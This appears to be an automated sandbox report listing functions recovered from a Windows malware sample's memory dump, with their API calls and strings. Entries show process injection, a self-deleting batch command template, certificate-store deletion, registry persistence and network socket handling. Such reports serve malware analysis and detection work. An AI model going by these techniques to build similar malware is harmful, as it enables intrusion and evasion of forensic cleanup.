lstrcpynA.KERNEL32(?,?\C,00000003,?,00AE939A,00000000,00B15FC9,?,?,?,00B15FC9,?), ref: 00B15DE7

Strings

?\C, xrefs: 00B15DDC

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AED2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00AED315
VerQueryValueW.VERSION(?,?,?,?), ref: 00AED382

Part of subcall function 00B13C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00B13C98
Part of subcall function 00B13C83: StrCmpIW.SHLWAPI(?,?), ref: 00B13CA2

Strings

\VarFileInfo\Translation, xrefs: 00AED30A
\StringFileInfo\%04x%04x\%s, xrefs: 00AED357

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00AF3341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00AF334C

Part of subcall function 00AF338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00AF33AB
Part of subcall function 00AF338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00AF33B6
Part of subcall function 00AF338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00AF33C1
Part of subcall function 00AF338D: lstrcmpiW.KERNEL32(?), ref: 00AF344E
Part of subcall function 00AF338D: memcpy.MSVCRT ref: 00AF3471
Part of subcall function 00AF338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00AF349C
Part of subcall function 00AF338D: memcpy.MSVCRT ref: 00AF34CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 00AF333A
GdipDisposeImage, xrefs: 00AF3343

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AECD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1), ref: 00AECD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1), ref: 00AECE9F

Part of subcall function 00AEF0E1: memcmp.MSVCRT ref: 00AEF0FD

memcpy.MSVCRT ref: 00AECDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1,?,00000002), ref: 00AECDDD

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00AECE11

Part of subcall function 00B0D95F: GetSystemTime.KERNEL32(?), ref: 00B0D969

Part of subcall function 00AEEDAE: memcpy.MSVCRT ref: 00AEEDF9

Part of subcall function 00AEEEE2: memcpy.MSVCRT ref: 00AEEFC1
Part of subcall function 00AEEEE2: memcpy.MSVCRT ref: 00AEEFE2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B06C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 00B06D07
memcpy.MSVCRT ref: 00B06E14

Part of subcall function 00B12B3C: connect.WS2_32(?,?), ref: 00B12B7A
Part of subcall function 00B12B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00B12B89
Part of subcall function 00B12B3C: WSASetLastError.WS2_32 ref: 00B12BA7
Part of subcall function 00B12B3C: WSAGetLastError.WS2_32 ref: 00B12BA9
Part of subcall function 00B12B3C: WSASetLastError.WS2_32(?), ref: 00B12BE7

memcmp.MSVCRT ref: 00B06F11

Part of subcall function 00B12EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00AEFD6D,?,00000004,00007530,?,?,?,?), ref: 00B12ED9
Part of subcall function 00B12EA3: WSASetLastError.WS2_32(?), ref: 00B12F21

Part of subcall function 00B06A51: memcmp.MSVCRT ref: 00B06A97

Part of subcall function 00B05D47: memset.MSVCRT ref: 00B05D57
Part of subcall function 00B05D47: memcpy.MSVCRT ref: 00B05D80

memset.MSVCRT ref: 00B06F76
memcpy.MSVCRT ref: 00B06F87

Part of subcall function 00B05D97: memcpy.MSVCRT ref: 00B05DA8

Part of subcall function 00B069A2: memcmp.MSVCRT ref: 00B069DE

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AED6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00AED979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00AED6D2
memcpy.MSVCRT ref: 00AED74E
memcpy.MSVCRT ref: 00AED762
memcpy.MSVCRT ref: 00AED78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00AED979,00000001,?,00000000,?,?,?,00000000), ref: 00AED7B2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5A4F, Relevance: 7.8, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A51

Part of subcall function 00B04B8D: WaitForSingleObject.KERNEL32(00000000,00AFE1D7), ref: 00B04B95

TlsGetValue.KERNEL32(?,?,00AEB9B4), ref: 00AF5A6E
TlsSetValue.KERNEL32(00000001), ref: 00AF5A80
SetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A90

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0B562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 00B0B587
memcpy.MSVCRT ref: 00B0B5E7
memcpy.MSVCRT ref: 00B0B5FF

Part of subcall function 00AE9F94: memset.MSVCRT ref: 00AE9FA8

Part of subcall function 00AFBD8C: memset.MSVCRT ref: 00AFBE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00B0B66A
memcpy.MSVCRT ref: 00B0B6A8

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00AF6D88
recv.WS2_32(?,?,00000400,00000000), ref: 00AF6DB4
send.WS2_32(?,?,?,00000000), ref: 00AF6DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00AF6E03

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEC907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00AECB5E,?), ref: 00AEC961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00AECB5E,?), ref: 00AEC9C9

Part of subcall function 00AEC3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AEC404

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

InterlockedIncrement.KERNEL32 ref: 00AEC99E
SetEvent.KERNEL32 ref: 00AEC9BC

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,00AED091,?,?,00000000,0000EA60,00000000), ref: 00AF5B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 00AF5B6C
CloseHandle.KERNEL32 ref: 00AF5B7C

Part of subcall function 00AF69C9: HeapAlloc.KERNEL32(00000000,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?,?,?), ref: 00AF69F3
Part of subcall function 00AF69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?), ref: 00AF6A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00AED091,?,?,00000000,0000EA60,00000000), ref: 00AF5BAC

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF8459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(00DB2864,3D920700), ref: 00AF84C0

Part of subcall function 00AF81D6: GetTickCount.KERNEL32 ref: 00AF81DE

LeaveCriticalSection.KERNEL32(00DB2864), ref: 00AF869F

Part of subcall function 00AF8339: IsBadReadPtr.KERNEL32 ref: 00AF8405
Part of subcall function 00AF8339: IsBadReadPtr.KERNEL32 ref: 00AF8424

getservbyname.WS2_32(?,00000000), ref: 00AF853A

Part of subcall function 00AF8A90: memcpy.MSVCRT ref: 00AF8C64
Part of subcall function 00AF8A90: memcpy.MSVCRT ref: 00AF8D64

Part of subcall function 00AF8770: memcpy.MSVCRT ref: 00AF8944
Part of subcall function 00AF8770: memcpy.MSVCRT ref: 00AF8A44

memcpy.MSVCRT ref: 00AF8619

Part of subcall function 00B12471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00B22910,?,?), ref: 00B1249E

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF8162: TlsAlloc.KERNEL32(00DB2864,00AF8636,?,?,?,?,00DB2858,?), ref: 00AF816B
Part of subcall function 00AF8162: TlsGetValue.KERNEL32(?,00000001,00DB2864), ref: 00AF817D
Part of subcall function 00AF8162: TlsSetValue.KERNEL32(?,?), ref: 00AF81C2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(00B23510), ref: 00AF5E33
LeaveCriticalSection.KERNEL32(00B23510), ref: 00AF5E59

Part of subcall function 00AF5DBC: InitializeCriticalSection.KERNEL32(00B23648), ref: 00AF5DC1
Part of subcall function 00AF5DBC: memset.MSVCRT ref: 00AF5DD0

EnterCriticalSection.KERNEL32(00B23648), ref: 00AF5E64
LeaveCriticalSection.KERNEL32(00B23648), ref: 00AF5EDC

Part of subcall function 00AEA509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AEA54A
Part of subcall function 00AEA509: PathRenameExtensionW.SHLWAPI(?,?), ref: 00AEA59B

Part of subcall function 00AEA5B2: memset.MSVCRT ref: 00AEA757
Part of subcall function 00AEA5B2: memcpy.MSVCRT ref: 00AEA780
Part of subcall function 00AEA5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00AEA885
Part of subcall function 00AEA5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AEA8A1

Sleep.KERNEL32(000007D0), ref: 00AF5ECF

Part of subcall function 00AEA947: memset.MSVCRT ref: 00AEA969

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0CB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 00B0CD50

Part of subcall function 00B0CB99: memcpy.MSVCRT ref: 00B0CBB0
Part of subcall function 00B0CB99: CharLowerA.USER32 ref: 00B0CC7B
Part of subcall function 00B0CB99: CharLowerA.USER32(?), ref: 00B0CC8B

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 00B12DBA: WSAGetLastError.WS2_32 ref: 00B12DF0
Part of subcall function 00B12DBA: WSASetLastError.WS2_32(00002775), ref: 00B12E54

memcmp.MSVCRT ref: 00AF2038
memcmp.MSVCRT ref: 00AF2050
memcpy.MSVCRT ref: 00AF2085

Part of subcall function 00B0F70B: memcpy.MSVCRT ref: 00B0F718

Part of subcall function 00B0F8BA: memcpy.MSVCRT ref: 00B0F8E7

Part of subcall function 00AEFF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,00AF2175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00AEFF57
Part of subcall function 00AEFF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,00AF2175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00AEFF7B

Part of subcall function 00AF1F85: GetTickCount.KERNEL32 ref: 00AF1F92

Part of subcall function 00B12AB4: memset.MSVCRT ref: 00B12AC9
Part of subcall function 00B12AB4: getsockname.WS2_32(?,00AEC22C,?), ref: 00B12ADC

Part of subcall function 00B1306E: memcmp.MSVCRT ref: 00B13090

Part of subcall function 00B06C9A: memcmp.MSVCRT ref: 00B06D07
Part of subcall function 00B06C9A: memcpy.MSVCRT ref: 00B06E14
Part of subcall function 00B06C9A: memcmp.MSVCRT ref: 00B06F11
Part of subcall function 00B06C9A: memset.MSVCRT ref: 00B06F76
Part of subcall function 00B06C9A: memcpy.MSVCRT ref: 00B06F87

Strings

GET , xrefs: 00AF2032
POST , xrefs: 00AF204A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF65F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 00AF5D25: memset.MSVCRT ref: 00AF5D35

lstrlenA.KERNEL32(?,?,?), ref: 00AF66BC
lstrlenA.KERNEL32(?), ref: 00AF66CF

Part of subcall function 00B0CB99: memcpy.MSVCRT ref: 00B0CBB0
Part of subcall function 00B0CB99: CharLowerA.USER32 ref: 00B0CC7B
Part of subcall function 00B0CB99: CharLowerA.USER32(?), ref: 00B0CC8B
Part of subcall function 00B0CB99: memcpy.MSVCRT ref: 00B0CD50

Part of subcall function 00AF6AE4: memcpy.MSVCRT ref: 00AF6AF7

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Strings

?*, xrefs: 00AF66B1
:, xrefs: 00AF670A
:, xrefs: 00AF6731

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFD9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 00AF5A4F: GetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A51
Part of subcall function 00AF5A4F: TlsGetValue.KERNEL32(?,?,00AEB9B4), ref: 00AF5A6E
Part of subcall function 00AF5A4F: TlsSetValue.KERNEL32(00000001), ref: 00AF5A80
Part of subcall function 00AF5A4F: SetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A90

GetProcessId.KERNEL32(?), ref: 00AFDA83

Part of subcall function 00B0BE5A: CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00B0BEA0
Part of subcall function 00B0BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00B0BEAC
Part of subcall function 00B0BE5A: CloseHandle.KERNEL32 ref: 00B0BEBA

Part of subcall function 00AEFBD5: TlsGetValue.KERNEL32(?,?,00AFD975), ref: 00AEFBDE

Part of subcall function 00B04A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04A89
Part of subcall function 00B04A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04AC4
Part of subcall function 00B04A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B04
Part of subcall function 00B04A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B27
Part of subcall function 00B04A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B04B77

GetThreadContext.KERNEL32 ref: 00AFDAE5
SetThreadContext.KERNEL32(?,?), ref: 00AFDB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00AFDB3B
CloseHandle.KERNEL32(?), ref: 00AFDB45

Part of subcall function 00AF5AD5: GetLastError.KERNEL32(?,00AEBA1E), ref: 00AF5AD6
Part of subcall function 00AF5AD5: TlsSetValue.KERNEL32(00000000), ref: 00AF5AE6
Part of subcall function 00AF5AD5: SetLastError.KERNEL32(?,?,00AEBA1E), ref: 00AF5AED

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0B9D8, Relevance: 7.6, APIs: 5, Instructions: 91

APIs

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

PathIsDirectoryW.SHLWAPI(?), ref: 00B0BA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00B0BA30

Part of subcall function 00B0B883: memcpy.MSVCRT ref: 00B0B9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00B0BA76

Part of subcall function 00AEE717: memcpy.MSVCRT ref: 00AEE775
Part of subcall function 00AEE717: memcpy.MSVCRT ref: 00AEE78A
Part of subcall function 00AEE717: memcpy.MSVCRT ref: 00AEE79F
Part of subcall function 00AEE717: memcpy.MSVCRT ref: 00AEE7AE
Part of subcall function 00AEE717: SetFileTime.KERNEL32(?,?,?,?), ref: 00AEE813

CloseHandle.KERNEL32 ref: 00B0BA95
PathRemoveFileSpecW.SHLWAPI ref: 00B0BAA2

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEC77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 00AEF1A8: EnterCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1B8
Part of subcall function 00AEF1A8: LeaveCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1E2

memset.MSVCRT ref: 00AEC7BC
memset.MSVCRT ref: 00AEC7C8
memset.MSVCRT ref: 00AEC7D4
InitializeCriticalSection.KERNEL32 ref: 00AEC7EC
InitializeCriticalSection.KERNEL32 ref: 00AEC807
InitializeCriticalSection.KERNEL32 ref: 00AEC844

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00B00734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 00B00745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 00B00750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00B00758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00B00766

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEDB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(?), ref: 00AEDB95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AEDBA6
CloseHandle.KERNEL32(?), ref: 00AEDBAF
CloseHandle.KERNEL32(?), ref: 00AEDBBE

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

DeleteCriticalSection.KERNEL32(00DB2820,?,00AEDB81,00DB2820), ref: 00AEDBD5

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B010E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 00B00D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00B00D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B011A5
RegFlushKey.ADVAPI32(00000000), ref: 00B011D3
RegCloseKey.ADVAPI32(00000000), ref: 00B011DA

Part of subcall function 00B01051: EnterCriticalSection.KERNEL32(00B23510,?,?,00000000,00B011FB,?,?,?,7C809C98,00000014,00000000), ref: 00B01067
Part of subcall function 00B01051: LeaveCriticalSection.KERNEL32(00B23510,?,?,00000000,00B011FB,?,?,?,7C809C98,00000014,00000000), ref: 00B0108F
Part of subcall function 00B01051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00B010AB
Part of subcall function 00B01051: GetProcAddress.KERNEL32 ref: 00B010B2
Part of subcall function 00B01051: RegDeleteKeyW.ADVAPI32(?,?), ref: 00B010D4

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Part of subcall function 00B00D19: RegFlushKey.ADVAPI32 ref: 00B00D29
Part of subcall function 00B00D19: RegCloseKey.ADVAPI32 ref: 00B00D31

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00AEB41A,?), ref: 00AF9F69

Part of subcall function 00B107B1: CoCreateInstance.OLE32(00AE17F8,00000000,00004401,00AE1858,?), ref: 00B107C6

#2.OLEAUT32(00AEB41A,00000000,?,?,?,00AEB41A,?), ref: 00AF9F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AEB41A,?), ref: 00AF9FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AF9FF2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0575A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 68

APIs

memset.MSVCRT ref: 00B05774

Part of subcall function 00B0BAD3: memcpy.MSVCRT ref: 00B0BAEE
Part of subcall function 00B0BAD3: StringFromGUID2.OLE32(?), ref: 00B0BB92

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B057BA

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Strings

Software\Microsoft\Yfosteyq, xrefs: 00B0576E 00B05773 00B057FB
Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00B0577F

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 00AF6E41
memcpy.MSVCRT ref: 00AF6E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00AF6E74
WSASetLastError.WS2_32(0000274C), ref: 00AF6E83

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 00B127C1: socket.WS2_32(?,?,00000006), ref: 00B127F5

bind.WS2_32(?,00B12CD1), ref: 00B12C3A
listen.WS2_32(?,00000014), ref: 00B12C4F
WSAGetLastError.WS2_32(00000000,?,00B12CD1,?,?,?,?,00000000), ref: 00B12C5D

Part of subcall function 00B12968: shutdown.WS2_32(?,00000002), ref: 00B12976
Part of subcall function 00B12968: closesocket.WS2_32(?), ref: 00B1297F
Part of subcall function 00B12968: WSACloseEvent.WS2_32(?), ref: 00B12992

WSASetLastError.WS2_32(?,?,00B12CD1,?,?,?,?,00000000), ref: 00B12C6D

Part of subcall function 00B12917: WSACreateEvent.WS2_32(00000000,?,00B12C15,?,00000000,?,00B12CD1,?,?,?,?,00000000), ref: 00B1292D
Part of subcall function 00B12917: WSAEventSelect.WS2_32(?,?,00B12CD1), ref: 00B12943
Part of subcall function 00B12917: WSACloseEvent.WS2_32(?), ref: 00B12957

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AECBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 00AEF1EF: memcmp.MSVCRT ref: 00AEF1FB

Part of subcall function 00AEF20B: memset.MSVCRT ref: 00AEF219
Part of subcall function 00AEF20B: memcpy.MSVCRT ref: 00AEF23A
Part of subcall function 00AEF20B: memcpy.MSVCRT ref: 00AEF260
Part of subcall function 00AEF20B: memcpy.MSVCRT ref: 00AEF284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00AED203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00AECC39

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00AED203,?,?,00000000,?), ref: 00AECCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00AED203,?,?,00000000,?), ref: 00AECCD2

Part of subcall function 00AEF0E1: memcmp.MSVCRT ref: 00AEF0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00AED203,?,?,00000000), ref: 00AECD20

Part of subcall function 00AEEEE2: memcpy.MSVCRT ref: 00AEEFC1
Part of subcall function 00AEEEE2: memcpy.MSVCRT ref: 00AEEFE2

Part of subcall function 00B0D95F: GetSystemTime.KERNEL32(?), ref: 00B0D969

Part of subcall function 00AEEDAE: memcpy.MSVCRT ref: 00AEEDF9

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00AF25BA
GetSystemTime.KERNEL32(?), ref: 00AF260D
CharLowerW.USER32(?), ref: 00AF265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 00AF268D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B14D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 00B14B12: EnterCriticalSection.KERNEL32(00B23510,00DB1E90,00B14D87,?,00DB1E90), ref: 00B14B22
Part of subcall function 00B14B12: LeaveCriticalSection.KERNEL32(00B23510,?,00DB1E90), ref: 00B14B51

Part of subcall function 00AED2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00AED315
Part of subcall function 00AED2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 00AED382

GetCommandLineW.KERNEL32 ref: 00B14E01
CommandLineToArgvW.SHELL32 ref: 00B14E08
LocalFree.KERNEL32 ref: 00B14E48

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

